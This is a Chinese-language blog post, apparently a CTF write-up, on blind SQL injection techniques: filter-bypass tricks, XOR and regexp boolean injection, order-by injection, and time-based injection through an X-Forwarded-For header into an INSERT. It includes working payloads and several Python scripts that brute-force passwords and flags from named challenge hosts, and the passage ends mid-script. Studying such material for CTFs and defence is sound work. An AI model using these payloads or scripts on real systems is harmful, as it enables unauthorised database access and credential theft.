<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-hk">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="SQL注入," />










<meta name="description" content="SQL注入小tricks or的两边可以没空格，可以是’)( %09(制表符),%0a(换行符)有时候可绕过空格过滤 union select被过滤，可以用union%0bselect regexp与rlike相同 select * from users where name=&amp;#39;John&amp;#39;与select * from users where name in(&amp;#39;John&amp;#3">
<meta name="keywords" content="SQL注入">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL盲注的多种姿势">
<meta property="og:url" content="http://yoursite.com/2099/02/17/SQL盲注的多种姿势/index.html">
<meta property="og:site_name" content="C0mRaDe&#39;s Blog">
<meta property="og:description" content="SQL注入小tricks or的两边可以没空格，可以是’)( %09(制表符),%0a(换行符)有时候可绕过空格过滤 union select被过滤，可以用union%0bselect regexp与rlike相同 select * from users where name=&amp;#39;John&amp;#39;与select * from users where name in(&amp;#39;John&amp;#3">
<meta property="og:locale" content="zh-hk">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538808209072.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538811417789.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538811824993.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1540190754336.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1541139922774.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1541179306013.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1541179323951.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538809596887.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538809609232.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538809776784.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538810805926.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538810997036.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538811009629.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538794724753.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538808272652.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538808449868.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538808524101.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538809310285.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538812183618.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538917677612.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538917873808.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538919333595.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1542386360233.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1542386446525.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1542386437531.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1542387690229.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1542697884008.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1542387822937.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1550307415495.png">
<meta property="og:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1550309346525.png">
<meta property="og:updated_time" content="2019-03-01T17:12:18.676Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL盲注的多种姿势">
<meta name="twitter:description" content="SQL注入小tricks or的两边可以没空格，可以是’)( %09(制表符),%0a(换行符)有时候可绕过空格过滤 union select被过滤，可以用union%0bselect regexp与rlike相同 select * from users where name=&amp;#39;John&amp;#39;与select * from users where name in(&amp;#39;John&amp;#3">
<meta name="twitter:image" content="https://www.github.com/coomrade/Img/raw/master/pics/1538808209072.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2099/02/17/SQL盲注的多种姿势/"/>





  <title>SQL盲注的多种姿势 | C0mRaDe's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-hk">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">C0mRaDe's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">自然选择号，前进四.</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首頁
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            關於
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            歸檔
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2099/02/17/SQL盲注的多种姿势/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="C0mRaDe">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/gabe-crow.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="C0mRaDe's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL盲注的多种姿势</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">發表於</span>
              
              <time title="創建於" itemprop="dateCreated datePublished" datetime="2099-02-17T15:52:14+08:00">
                2099-02-17
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分類於</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/信息安全/" itemprop="url" rel="index">
                    <span itemprop="name">信息安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="SQL注入小tricks"><a href="#SQL注入小tricks" class="headerlink" title="SQL注入小tricks"></a>SQL注入小tricks</h1><ul>
<li>or的两边可以没空格，可以是’)(</li>
<li><code>%09</code>(制表符),<code>%0a</code>(换行符)有时候可绕过空格过滤</li>
<li><code>union select</code>被过滤，可以用<code>union%0bselect</code></li>
<li><code>regexp</code>与<code>rlike</code>相同</li>
<li><code>select * from users where name=&#39;John&#39;</code>与<code>select * from users where name in(&#39;John&#39;)</code>相同<img src="https://www.github.com/coomrade/Img/raw/master/pics/1538808209072.png" alt="enter description here"><a id="more"></a></li>
<li><code>like</code>可以替换<code>=</code></li>
<li><code>limit offset</code>可以替换<code>limit ?,?</code>，<code>limit m offset n</code>equals to 从第<code>n+1</code>行开始取m行<img src="https://www.github.com/coomrade/Img/raw/master/pics/1538811417789.png" alt="enter description here"></li>
<li><code>&lt;&gt;</code>equals to <code>!=</code></li>
<li>join注入，payload:<code>1&#39; union select * from (select 1) a join (select 2) b %23</code><img src="https://www.github.com/coomrade/Img/raw/master/pics/1538811824993.png" alt="enter description here"></li>
<li><code>if(condition,do1,do2)</code>equals to<code>select case when condition then do1 else do2 end</code></li>
<li><code>...union select+1,2,3,4</code></li>
<li><code>union select@a:=1,2,3,4</code><img src="https://www.github.com/coomrade/Img/raw/master/pics/1540190754336.png" alt="enter description here"></li>
<li><code>between..and..</code>代替比较符，如果截取函数被过滤，可以直接用<code>between..and..</code>逐位比较得到结果，如果引号被过滤，就用16进制。<a href="https://www.anquanke.com/post/id/158674" target="_blank" rel="noopener">https://www.anquanke.com/post/id/158674</a></li>
<li><code>binary</code>表示区分大小写<img src="https://www.github.com/coomrade/Img/raw/master/pics/1541139922774.png" alt="enter description here"></li>
<li><code>information_schema.??</code>被过滤？try <code>information_schema/**/.??</code> or <code>information_schema./**/??</code></li>
<li><code>select distinct(Db) from mysql.db;select distinct(database_name) from mysql.innodb_index_stats;//mysql&gt;5.6select distinct(database_name) from mysql.innodb_table_stats;//mysql&gt;5.6</code></li>
<li>实在什么都不知道的情况下，可以猜。</li>
</ul>
<h1 id="只知道表名不知道列名的情况"><a href="#只知道表名不知道列名的情况" class="headerlink" title="只知道表名不知道列名的情况"></a>只知道表名不知道列名的情况</h1><p>之前做安恒十月月赛就遇到了这种情况，这是个盲注题，题目告诉了有个<code>flag</code>表，但是不知道列名。接下来我们看看怎么处理这种情况。<br>如果直接<code>select*</code>，列名还是原来的列名，无法<code>select</code><img src="https://www.github.com/coomrade/Img/raw/master/pics/1541179306013.png" alt="enter description here">这时候可以用这种姿势：<img src="https://www.github.com/coomrade/Img/raw/master/pics/1541179323951.png" alt="enter description here">可以看到，这时候列名已经变成了<code>1,2,3</code>,再加上<code>limit</code>语句，就可以实现很精确地查询某一条信息。</p>
<h1 id="SQL盲注的多种姿势"><a href="#SQL盲注的多种姿势" class="headerlink" title="SQL盲注的多种姿势"></a>SQL盲注的多种姿势</h1><p>对于无回显的SQL盲注，基本的有时间盲注和布尔盲注两大方面，但其实这两样又可以有很多种姿势</p>
<h2 id="XOR盲注"><a href="#XOR盲注" class="headerlink" title="XOR盲注"></a>XOR盲注</h2><p>XOR也就是异或，异或符号在MySQL中是<code>^</code>，它可以起到一个逻辑判断的作用，我们知道<code>0^1=1,0^0=0</code>，因此可以通过不同的布尔值形成盲注。<br>给一道题目,<a href="http://123.206.31.85:49167/" target="_blank" rel="noopener">http://123.206.31.85:49167/</a> <img src="https://www.github.com/coomrade/Img/raw/master/pics/1538809596887.png" alt="enter description here"><img src="https://www.github.com/coomrade/Img/raw/master/pics/1538809609232.png" alt="enter description here">可以看出来，我们应该是要注出admin用户的密码，fuzz一下<img src="https://www.github.com/coomrade/Img/raw/master/pics/1538809776784.png" alt="enter description here">再结合手工fuzz，发现<code>or, ,%09,%0a,/**/</code>也被过滤了，过滤了and和or，没有过滤^，那就可以尝试一下XOR注入。<code>information_schema</code>也被过滤了,那很可能要猜解的字段就在当前表，直接猜测是<code>password</code>。可以用这种payload来注出database():<code>admin&#39;^(ascii(mid((database())from(1)))&gt;66)%23</code><img src="https://www.github.com/coomrade/Img/raw/master/pics/1538810805926.png" alt="enter description here"><br>exp:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url=<span class="string">"http://123.206.31.85:49167/index.php"</span></span><br><span class="line">proxies=&#123;<span class="string">"http"</span>:<span class="string">"http://127.0.0.1:8080"</span>&#125;</span><br><span class="line">pwd=<span class="string">''</span></span><br><span class="line">order=<span class="number">1</span></span><br><span class="line">headers=&#123;<span class="string">"Host"</span>: <span class="string">"123.206.31.85:49167"</span>,</span><br><span class="line"><span class="string">"User-Agent"</span>: <span class="string">"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0"</span>,</span><br><span class="line"><span class="string">"Accept"</span>: <span class="string">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>,</span><br><span class="line"><span class="string">"Accept-Language"</span>: <span class="string">"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"</span>,</span><br><span class="line"><span class="string">"Accept-Encoding"</span>: <span class="string">"gzip, deflate"</span>,</span><br><span class="line"><span class="string">"Referer"</span>: <span class="string">"http://123.206.31.85:49167/index.php"</span>,</span><br><span class="line"><span class="string">"Content-Type"</span>: <span class="string">"application/x-www-form-urlencoded"</span>,</span><br><span class="line"><span class="string">"Content-Length"</span>: <span class="string">"66"</span>,</span><br><span class="line"><span class="string">"Connection"</span>: <span class="string">"close"</span>,</span><br><span class="line"><span class="string">"Upgrade-Insecure-Requests"</span>: <span class="string">"1"</span>&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">	<span class="keyword">for</span> num <span class="keyword">in</span> xrange(<span class="number">32</span>,<span class="number">127</span>):</span><br><span class="line">		r=requests.post(url=url,</span><br><span class="line">			data=<span class="string">'''username=admin'^(ascii(mid((password)from(%s)))&gt;%s)'''</span>%(order,num)+<span class="string">'''%'''</span>+<span class="string">'''23&amp;password=asda'''</span>,</span><br><span class="line">			proxies=proxies,headers=headers)</span><br><span class="line">		<span class="keyword">if</span> <span class="string">'password error!'</span> <span class="keyword">in</span> r.content:</span><br><span class="line">			pwd+=chr(num)</span><br><span class="line">			order+=<span class="number">1</span></span><br><span class="line">			<span class="keyword">print</span> pwd</span><br><span class="line">			<span class="keyword">break</span></span><br></pre></td></tr></table></figure></p>
<p>注出password为一串md5，拿去解密然后登录即可getflag。<img src="https://www.github.com/coomrade/Img/raw/master/pics/1538810997036.png" alt="enter description here"><img src="https://www.github.com/coomrade/Img/raw/master/pics/1538811009629.png" alt="enter description here">解法2：结合<code>regexp</code><br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#encoding:utf-8</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url=<span class="string">'http://123.206.31.85:49167/index.php'</span></span><br><span class="line">proxies=&#123;<span class="string">'http'</span>:<span class="string">'http://127.0.0.1:8080'</span>&#125;</span><br><span class="line">headers=&#123;<span class="string">'Host'</span>: <span class="string">'123.206.31.85:49167'</span>,</span><br><span class="line"><span class="string">'User-Agent'</span>: <span class="string">'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0'</span>,</span><br><span class="line"><span class="string">'Accept'</span>: <span class="string">'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'</span>,</span><br><span class="line"><span class="string">'Accept-Language'</span>: <span class="string">'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'</span>,</span><br><span class="line"><span class="string">'Accept-Encoding'</span>: <span class="string">'gzip, deflate'</span>,</span><br><span class="line"><span class="string">'Referer'</span>: <span class="string">'http://123.206.31.85:49167/index.php'</span>,</span><br><span class="line"><span class="string">'Content-Type'</span>: <span class="string">'application/x-www-form-urlencoded'</span>,</span><br><span class="line"><span class="string">'Content-Length'</span>: <span class="string">'65'</span>,</span><br><span class="line"><span class="string">'Connection'</span>: <span class="string">'close'</span>,</span><br><span class="line"><span class="string">'Upgrade-Insecure-Requests'</span>: <span class="string">'1'</span>&#125;</span><br><span class="line"></span><br><span class="line">payload=<span class="string">''</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">48</span>,<span class="number">58</span>)+range(<span class="number">97</span>,<span class="number">123</span>):</span><br><span class="line">		r=requests.post(url=url,proxies=proxies,headers=headers,timeout=<span class="number">5</span>,</span><br><span class="line">			data=<span class="string">'''username=admin'^((password)regexp('%s$'))#&amp;password='''</span>%(chr(i)+payload))</span><br><span class="line">		<span class="keyword">if</span> <span class="string">'does not exist!'</span> <span class="keyword">in</span> r.content:</span><br><span class="line">			payload=chr(i)+payload</span><br><span class="line">			<span class="keyword">print</span> payload</span><br><span class="line">			<span class="keyword">break</span></span><br></pre></td></tr></table></figure></p>
<p>使用场景：过滤了and、or、逗号、空格</p>
<h2 id="regexp-rlike盲注"><a href="#regexp-rlike盲注" class="headerlink" title="regexp/rlike盲注"></a>regexp/rlike盲注</h2><p><code>regexp</code>是MySQL中一个用以正则判断的函数，用法如<code>select (select...) regexp(&#39;^...$&#39;)</code><br>such as:<img src="https://www.github.com/coomrade/Img/raw/master/pics/1538794724753.png" alt="enter description here">会返回一个值表示是否匹配给定的正则表达式,<code>^$</code>分别表示字符串的开始符和结束符，在注入的时候，如果没有过滤<code>^</code>，我们可以配合<code>mid((select...)from(%s))</code>来逐个字符猜解，如果过滤了<code>^</code>，但没有过滤<code>$</code>，就要用<code>mid((select...)from(%s)for(1))</code>的格式，这时候不能省略for<img src="https://www.github.com/coomrade/Img/raw/master/pics/1538808272652.png" alt="enter description here">从一道题目来练习，<a href="http://ctf5.shiyanbar.com/web/earnest/index.php" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/web/earnest/index.php</a> 首先可以fuzz一下，发现过滤了不少东西<img src="https://www.github.com/coomrade/Img/raw/master/pics/1538808449868.png" alt="enter description here">再来看一下功能,输入1，提示’you are in’<img src="https://www.github.com/coomrade/Img/raw/master/pics/1538808524101.png" alt="enter description here">输入0提示’you are not in’，但是输入<code>1&#39;--</code>和<code>0&#39;or&#39;1</code>都是返回’you are not in’，说明后端可能对某些关键词进行了处理，这里用大小写可以绕过,比如<code>0&#39;Or&#39;1</code>会返回’you are in’，再测试了一下，发现双写(oorr)也可以绕过。对于注释符<code>--</code>，猜测后台把它替换为空，但既无法双写绕过也无法大小写绕过，所以这题无法使用注释符，只能用引号闭合。题目禁了<code>substr</code>，可以用<code>mid</code>代替，禁了<code>,</code>，可以用<code>mid</code>的<code>from()for()</code>结构来代替，禁用了<code>^</code>，无法用XOR注入，这里可以用<code>regexp注入</code>,题目还禁用了空格，可以用制表符绕过。综上，我们可以构造这样的payload:<code>0&#39;Or(select(ascii((mid((select database())from(%s)fOr(1))regexp(&#39;%s$&#39;)))))Or&#39;0</code>，然后逐步注入进去，如果有空格的地方就用<code>%09</code>代替。<br>exp:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url=<span class="string">'http://ctf5.shiyanbar.com/web/earnest/index.php'</span></span><br><span class="line">proxies=&#123;<span class="string">"http"</span>:<span class="string">"http://127.0.0.1:8080"</span>&#125;</span><br><span class="line">headers=&#123;<span class="string">"Host"</span>: <span class="string">"ctf5.shiyanbar.com"</span>,</span><br><span class="line"><span class="string">"User-Agent"</span>: <span class="string">"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0"</span>,</span><br><span class="line"><span class="string">"Accept"</span>: <span class="string">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>,</span><br><span class="line"><span class="string">'Accept-Language'</span>: <span class="string">'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'</span>,</span><br><span class="line"><span class="string">'Accept-Encoding'</span>: <span class="string">'gzip, deflate'</span>,</span><br><span class="line"><span class="string">'Referer'</span>: <span class="string">'http://ctf5.shiyanbar.com/web/earnest/index.php'</span>,</span><br><span class="line"><span class="string">'Content-Type'</span>: <span class="string">'application/x-www-form-urlencoded'</span>,</span><br><span class="line"><span class="string">'Content-Length'</span>: <span class="string">'149'</span>,</span><br><span class="line"><span class="string">'Connection'</span>: <span class="string">'close'</span>,</span><br><span class="line"><span class="string">'Upgrade-Insecure-Requests'</span>: <span class="string">'1'</span>&#125;</span><br><span class="line">order=<span class="number">1</span></span><br><span class="line">result=<span class="string">''</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">32</span>,<span class="number">127</span>):</span><br><span class="line">		payload=<span class="string">'''zxc'Or(select(ascii(mid((select fL$4G from fiag)from(%s)foorr(1)))regexp('%s$')))Or'0'''</span>%(order,i)</span><br><span class="line">		payload=payload.replace(<span class="string">' '</span>,<span class="string">r'''%09'''</span>)</span><br><span class="line">		<span class="keyword">print</span> payload</span><br><span class="line">		r=requests.post(url=url,headers=headers,proxies=proxies,</span><br><span class="line">			data=<span class="string">'''id='''</span>+payload)</span><br><span class="line">		<span class="keyword">if</span> <span class="string">'You are in'</span> <span class="keyword">in</span> r.content:</span><br><span class="line">			result+=chr(i)</span><br><span class="line">			order+=<span class="number">1</span></span><br><span class="line">			<span class="keyword">print</span> result</span><br><span class="line">			<span class="keyword">break</span></span><br><span class="line"><span class="comment"># (select(ascii((mid((select database())from(%s)foorr(1))regexp('%s$')))))</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://www.github.com/coomrade/Img/raw/master/pics/1538809310285.png" alt="enter description here">使用场景：过滤了<code>=、in、like</code></p>
<h2 id="order-by-盲注"><a href="#order-by-盲注" class="headerlink" title="order by 盲注"></a>order by 盲注</h2><p>基本原理：<code>order by</code>是选取一列作为排序的标准，默认是升序，基本原理如下图<img src="https://www.github.com/coomrade/Img/raw/master/pics/1538812183618.png" alt="enter description here">通过逐位遍历<code>union select</code>的某个参数，根据页面回显不同即可得到正确的结果。</p>
<h1 id="insert-into-注入"><a href="#insert-into-注入" class="headerlink" title="insert into 注入"></a>insert into 注入</h1><p>平时见得最多的注入都是基于<code>select</code>,如果要注入的是<code>select</code>语句，又该怎么处理呢？直接看一道题目，来自bugkuCTF，给了源码：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getIp</span><span class="params">()</span></span>&#123;</span><br><span class="line">$ip = <span class="string">''</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_SERVER[<span class="string">'HTTP_X_FORWARDED_FOR'</span>]))&#123;</span><br><span class="line">$ip = $_SERVER[<span class="string">'HTTP_X_FORWARDED_FOR'</span>];</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">$ip = $_SERVER[<span class="string">'REMOTE_ADDR'</span>];</span><br><span class="line">&#125;</span><br><span class="line">$ip_arr = explode(<span class="string">','</span>, $ip);</span><br><span class="line"><span class="keyword">return</span> $ip_arr[<span class="number">0</span>];</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$host=<span class="string">"localhost"</span>;</span><br><span class="line">$user=<span class="string">""</span>;</span><br><span class="line">$pass=<span class="string">""</span>;</span><br><span class="line">$db=<span class="string">""</span>;</span><br><span class="line"></span><br><span class="line">$connect = mysql_connect($host, $user, $pass) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"Unable to connect"</span>);</span><br><span class="line"></span><br><span class="line">mysql_select_db($db) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"Unable to select database"</span>);</span><br><span class="line"></span><br><span class="line">$ip = getIp();</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'your ip is :'</span>.$ip;</span><br><span class="line">$sql=<span class="string">"insert into client_ip (ip) values ('$ip')"</span>;</span><br><span class="line">mysql_query($sql);</span><br></pre></td></tr></table></figure></p>
<p>以<code>,</code>为分格符，换言之就是过滤了<code>,</code>，然后<code>insert</code>进表里，这题很明显没有回显，要盲注，过滤了逗号，对于mid，可以用<code>mid((select..)from..for..)</code>，对于if，可以用<code>select case when .. then 1 else 2 end</code>。接下来的问题就是要怎么把语句放进去，直接放是不行的<img src="https://www.github.com/coomrade/Img/raw/master/pics/1538917677612.png" alt="enter description here">由于引号的存在，会把语句当成字符串。这里要先用闭合引号，然后用+号连接语句，最后再把右括号补上。构造payload如下：<code>X-Forwarded-For:&#39;+(select case when 1 then sleep(3) else 0 end)+&#39;)</code>这样出来的SQL语句是这样的<img src="https://www.github.com/coomrade/Img/raw/master/pics/1538917873808.png" alt="enter description here">可以成功sleep。exp:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#encoding:utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests,time</span><br><span class="line"></span><br><span class="line">url=<span class="string">'http://120.24.86.145:8002/web15/'</span></span><br><span class="line">proxies=&#123;<span 